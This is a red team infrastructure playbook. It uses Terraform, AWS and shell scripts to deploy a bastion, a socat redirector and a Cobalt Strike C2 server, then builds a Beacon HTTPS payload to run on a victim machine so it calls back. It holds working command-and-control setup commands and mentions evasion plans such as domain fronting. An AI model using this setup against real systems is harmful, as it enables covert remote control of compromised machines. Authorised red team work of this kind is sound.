Playbook ยท Infrastructure

Terraforming The Cloud

Automating red team infrastructure with Terraform.

This guide documents using Terraform to build red team infrastructure, following the companion blog post on manual red team infrastructure setup. The repository lives at github.com/rbfp/redteam-infra.

Pre-Requisites

Create an additional IAM user (terraform-redteam) with Power User permissions, disable its console login, and create access keys. Install Terraform and the AWS CLI on a Kali/Linux box:

$ sudo apt update
$ sudo apt install terraform
$ sudo apt install awscli

Step 0 โ€” Download the GitHub Repo

Set up an SSH key with GitHub (docs), then clone:

$ git clone git@github.com:rbfp/redteam-infra.git
$ cd redteam-infra

Step 1 โ€” Configure AWS CLI

Use a dedicated profile to keep credentials separate. Default region: us-west-2.

$ aws configure --profile redteam

Step 2 โ€” Configure Region to Deploy

Run ./infra_setup.sh. It prompts for AWS profile, project name (e.g. redwest20), region, OS choice (Ubuntu recommended), and availability zones.

Step 3 โ€” Terraform the Cloud

The automated Terraform commands execute, creating ~30 resources with auto-generated credentials:

The redirector and C2 server can only SSH into their respective EC2 instances from within the bastion host.

Step 4 โ€” Verify Deployment

Use ./manage_aws.sh to start, stop, list instances, and check billing. Verify in the AWS Console that instances have no public IPv4 addresses, then test SSH through the bastion:

$ ssh -i ~/redteam_infra/build/{{ project_name }}-bastion.pem bastion@{{ bastion_ipv6 }}
$ ssh -i .ssh/internal.pem c2server@{{ c2_ipv4 }}

Step 5 โ€” Cobalt Strike Install

Run ./cobalt_setup.sh to automate dependency install and file deployment. It prompts for the redirector IPv6, C2 server IPv4, redirector IPv4, project name, and the Cobalt Strike 7z password.

Step 7 โ€” Cobalt Server Setup

Multiple concurrent terminal sessions are required.

On the C2 server:

$ chmod +x ./CS491/Server/teamserver ./CS491/Server/TeamServerImage
$ ./teamserver {{ c2_ipv4 }} {{ cobalt_server_pass }}

Attack box SSH tunnel:

$ ssh -i {{ project_name }}-bastion.pem -L 50050:{{ c2_ipv4 }}:50050 bastion@{{ bastion-ipv6 }}

Redirector traffic redirection:

$ sudo socat TCP6-LISTEN:443,reuseaddr,fork TCP4:{{ c2_ipv4 }}:443

Cobalt Strike client:

$ chmod +x ./cobaltstrike-client.sh
$ ./cobaltstrike-client.sh

Connect with host 127.0.0.1, port 50050.

Step 8 โ€” Proof of Concept

Listener: name HTTPS, payload Beacon HTTPS, HTTPS hosts set to the redirector IPv6 (square-bracket encapsulated).

Payload: listener HTTPS, system call Indirect, HTTP library winhttp. Execute the resulting .exe on the victim system to establish the beacon callback.

Future Considerations

Next steps are to work on domain fronting and a SOP/script for what to do when the redirector's public IPv6 gets burned.